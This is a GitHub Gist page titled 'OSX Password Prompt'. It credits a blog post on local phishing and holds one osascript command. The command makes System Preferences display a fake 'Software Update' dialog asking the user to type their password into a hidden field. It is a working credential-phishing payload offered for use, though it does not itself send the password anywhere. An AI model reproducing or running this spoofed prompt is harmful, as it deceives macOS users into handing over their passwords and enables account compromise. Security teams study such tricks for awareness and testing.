Created
October 7, 2014 21:44
-
-
Save jeffgeiger/75cfeeecbd802e82e7bc to your computer and use it in GitHub Desktop.
OSX Password Prompt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Cred to: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html | |
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
You're filthy.